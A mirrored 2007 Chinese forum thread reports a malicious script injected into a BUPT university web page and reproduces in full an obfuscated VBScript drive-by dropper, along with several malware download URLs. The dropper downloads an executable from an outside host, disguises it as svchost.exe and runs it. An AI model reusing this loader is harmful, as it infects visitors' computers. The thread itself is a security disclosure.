返回信息流可能是熊猫变种,其实,是一种比较典型的挂马方式,也不是很新的东西了.
打开此url
http://www.bupt.edu.cn/pages/out/manage1.asp
html源码中有这么一行
<script src="http://95258.136136.net/ad/ad.js"></script>
查询dns,136136.net已经无效
再查google,发现很多网站被挂上同一代码
但由于此url已经无效,无法得到源码进行进一步分析,google中找到一个相关说明
见下面的内容。
不过此种代码危害一般,很多年前我写过类似代码并本地测试过,
xp+sp2的默认安全设置是不允许操作本地fso的,仅管可通过xmlhttp对象下载病毒程序,
但无法本地保存并执行(以目前公开的技术为准)。
所以,大家不用担心,但也要小心为好,风险自负。
此外,也要感谢seajelly同学的提醒.
(是baidu的地址,我是通过google找到的)
引自:http://hi.baidu.com/itrose/blog/item/33e3c717f69cfc09c83d6d6c.html
----------------------------------------------------------
每个asp/aspx/htm文件中加入以下一行
<script src="hxxp://*.136136.net/ad/ad.js"></script>
另有熊猫资料:
hxxp://wangma.9966.org/zaqxsw.exe
hxxp://www.dgdbr.com/admin/top.exe (此为威金)
已将http改为hxxp,以保证安全.
其中第一个病毒有关网页来源:
<html>
<body>
<script type="text/jscript">
function init () {
document.write("<h1>Service Unavailable</h1>");}
window.onload = init;
</script>
<script language="VBScript">
on error resume next
tc = "http://wangma.9966.org/zaqxsw.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d",
"c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&
"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="Ad"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, tc, False
x.Send
d8="Sc"&"ript"&"ing."&"File"&"Syst"&"emO"&"bje"&"ct"
set F = df.createobject(d8,"")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell =
CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""pe""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"lica"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</script>
</body>
</html>
------------------------------------------------------------------
这是一条镜像帖。来源:北邮人论坛 / security / #8893同步于 2007/3/25
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
www.bupt.edu.cn被挂马,但已无危害
flyingkisser
2007/3/25镜像同步10 回复
订阅后,新回复会通过你的通知中心匿名送达。
9 条回复
忘了补一句,仅管没有大碍,希望相关管理员清理清理吧,毕竟
不是什么光彩的事。
【 在 flyingkisser (齐天大猫) 的大作中提到: 】
: 可能是熊猫变种,其实,是一种比较典型的挂马方式,也不是很新的东西了.
: 打开此url
: http://www.bupt.edu.cn/pages/out/manage1.asp
: ...................
【 在 flyingkisser 的大作中提到: 】
: 忘了补一句,仅管没有大碍,希望相关管理员清理清理吧,毕竟
: 不是什么光彩的事。
re
同学辛苦了,厉害啊[em68]
官网管理员确实该清理一下了
【 在 flyingkisser 的大作中提到: 】
: 可能是熊猫变种,其实,是一种比较典型的挂马方式,也不是很新的东西了.
: 打开此url
: http://www.bupt.edu.cn/pages/out/manage1.asp
: ...................
【 在 flyingkisser 的大作中提到: 】
: 可能是熊猫变种,其实,是一种比较典型的挂马方式,也不是很新的东西了.
: 打开此url
: http://www.bupt.edu.cn/pages/out/manage1.asp
: ...................
我刚看了一下,没发现。。。估计被清理了